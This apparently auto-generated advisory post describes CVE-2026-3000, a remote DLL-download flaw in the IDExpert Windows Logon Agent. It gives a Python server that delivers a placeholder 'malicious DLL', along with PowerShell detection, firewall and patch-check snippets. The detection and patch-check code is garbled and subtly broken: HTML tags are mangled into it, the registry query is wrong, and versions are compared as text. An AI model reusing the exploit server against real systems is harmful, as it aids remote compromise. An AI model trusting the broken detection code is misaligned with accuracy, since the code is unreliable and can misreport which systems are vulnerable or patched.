Listen to this Post
CVE-2026-3000 is a critical vulnerability in the IDExpert Windows Logon Agent developed by Changing Technologies . The flaw resides in how the agent handles remote resources. Specifically, the application fails to properly authenticate or validate remote requests related to dynamic link library (DLL) loading. An unauthenticated attacker can exploit this by sending a specially crafted request to a vulnerable system . This request forces the Windows Logon Agent to connect to an attacker-controlled remote server and download a malicious DLL file without any integrity or signature checks . Because the process runs with high privileges, the downloaded DLL is then executed within the context of the Logon Agent, leading to complete system compromise. The vulnerability affects all versions from 2.7.3.230719 up to and including 2.8.4.250925 . The attack requires no user interaction and can be initiated remotely across the network, making it highly dangerous for unpatched systems .
dailycve form:
Platform: Changing IDExpert
Version: 2.7.3.230719-2.8.4.250925
Vulnerability : Remote Code Execution
Severity: CRITICAL
date: 03/02/2026
Prediction: 03/03/2026
What Undercode Say:
Analytics:
- CWE-494: Download of Code Without Integrity Check
- CVSS 4.0 Score: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
- CVSS 3.1 Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Attack Vector: Remote & Unauthenticated
- EPSS Score (03/04/2026): 0.0010 (Percentile: 0.2790)
Exploit:
Simulated malicious DLL server setup (Python)
!/usr/bin/env python3
import http.server
import socketserver
PORT = 8080
MALICIOUS_DLL = b"MZ\x90\x00..." Placeholder for malicious shellcode
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path.endswith('.dll'):
self.send_response(200)
self.send_header('Content-type', 'application/octet-stream')
self.end_headers()
self.wfile.write(MALICIOUS_DLL)
print(f"[] Served malicious DLL to {self.client_address}")
else:
self.send_response(404)
self.end_headers()
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print(f"[] Serving malicious DLL on port {PORT}")
httpd.serve_forever()
Detection command to find vulnerable versions in Active Directory
Get-ADComputer -Filter {OperatingSystem -Like "Windows"} -Properties Name, OperatingSystem | ForEach-Object {
$computer = $<em>.Name
$version = Invoke-Command -ComputerName $computer -ScriptBlock {
(Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" | Where-Object {$</em>.DisplayName -like "IDExpert"}).DisplayVersion
} -ErrorAction SilentlyContinue
if ($version -le "2.8.4.250925" -and $version -ge "2.7.3.230719") {
Write-Host "Vulnerable System: $computer - Version: $version"
}
}
Protection from this CVE:
Immediate mitigation: Block outbound SMB/HTTP/HTTPS traffic from Logon Agents
netsh advfirewall firewall add rule name="Block_Outbound_DLL_Exploit" dir=out action=block protocol=TCP remoteport=80,443,445
Verify patch level (Corrected version is 2.8.4.251015 or later)
$installed = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" | Where-Object {$_.DisplayName -like "IDExpert"}).DisplayVersion
if ($installed -ge "2.8.4.251015") { Write-Host "Patched" } else { Write-Host "Vulnerable - Update Required" }
Download official patch
wget https://www.changingtec.com/patches/IDExpert_WinLogon_Patch_2.8.4.251015.exe -O patch.exe
Impact:
- Confidentiality: An attacker can read local files, access credentials, and enumerate domain information, leading to a total breach of system data .
- Integrity: The attacker can install malware, modify system files, or create backdoors, rendering the system untrustworthy .
- Availability: Critical services can be terminated or disrupted, causing denial of service to users relying on the Logon Agent for authentication .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

